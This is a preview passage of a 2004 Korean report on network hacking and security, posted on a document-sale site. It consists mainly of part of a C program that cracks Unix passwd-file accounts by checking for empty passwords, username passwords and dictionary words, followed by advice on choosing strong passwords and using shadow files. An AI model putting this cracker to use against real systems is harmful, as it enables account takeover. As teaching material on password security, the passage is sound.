네트워크 해킹과 보안
본 자료는 2페이지 의 미리보기를 제공합니다. 이미지를 클릭하여 주세요.
닫기
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
해당 자료는 2페이지 까지만 미리보기를 제공합니다.
2페이지 이후부터 다운로드 후 확인할 수 있습니다.

본문내용

n(i,"r");
printf("Results File: ");
gets(i);
o=fopen(i,"w");
fprintf(o,"*** PASS 1: NULL PASSWORDS ***\n");
while(ps)
{
fetch(es,p,as,ps);
if(ps) if(ps[-1]==':') fprintf(o,"|User[%s] has no password!\n",as);
}
fflush(o);
rewind(p);
fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");
do
{
fetch(es,p,as,ps);
if(ps) if(!strcmp((char *)crypt(as,ps),ps))
fprintf(o,"|User[%s]has password [%s]\n",as,as);
}while(ps);
fflush(o);
rewind(p);
fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");
do{
rewind(w);
fetch(es,p,as,ps);
do
{
fgets(ws,130,w);
ws[strlen(ws)-1]=0;
if(!strcmp((char *)crypt(ws,ps),ps))
{
fprintf(o,"| User [%s] has password [%s]\n",as,ws);
fflush(o);
break;
}
}while(!feof(w));
}while(!feof(p));
fprintf(o,"*** FINISHED SESSION ***\n");
exit(1);
}
이방법에 의해서는 root뿐만이 아니라 다른 일반 사용자의 계정도 알아 낼 수
있습니다. 시간만 여유롭다면... 보안의 관점에서 생각한다면 이러한 해킹의 방법을
숙지하고 자신의 password를 정할때 어떤 단어로 이루져 있거나 자신의 사용자
이름을 직접 또는 간접적으로 이용했거나하는 경우는 피해야 하고 주기적인
password변경에 의해 password관리를 해야 겠습니다.
이와 같은 해킹방법의 관점에서 생각할 때 자신의 지금의 password에 특수문자를
끼워 넣는다면 password가 cracker에 의해 도용될 가능성은 몇 백배 줄어 들게
됩니다. 또 시스템 관리자라면 passwd파일을 위와 같은 방식으로 저장하지 않고
shadow파일을 만들어 password와 다른 사용자 정보를 분리시켜 놓는 것도 권장할
만한 것 입니다. 그런데 사실 shadow파일에 대한 해킹 방법도 알려져 있어서 문제가
되긴 하겠지만 시간과 해킹방법의 난의도에 의해 많은 해킹을 막을 수 있습니다.
shadow파일에 대한 이야기는 다음에 하겠습니다.
*벌레(Bug)로 집 갈가 먹기
유닉스 시스템에는 엄청나게 많은 프로그램 파일들이 존재합니다.
유닉스의 기본 철학이 "작은 도구들을 여러가지 이용하여 큰 일을 해결하자"(???
라고 저도 들었어요.)입니다.
그래서 아주 크기가 작은 유틸리티나 명령어 들이 많죠.
그 많은 파일들을 사람이 만들었겠죠? 사람이 하는 일이다 보니 실수도 있는법이죠.
다음 기회에 뒷이야기는 적기로 하겠습니다.
  • 가격1,000
  • 페이지수7페이지
  • 등록일2004.08.06
  • 저작시기2004.08
  • 파일형식한글(hwp)
  • 자료번호#262689
본 자료는 최근 2주간 다운받은 회원이 없습니다.
청소해
다운로드 장바구니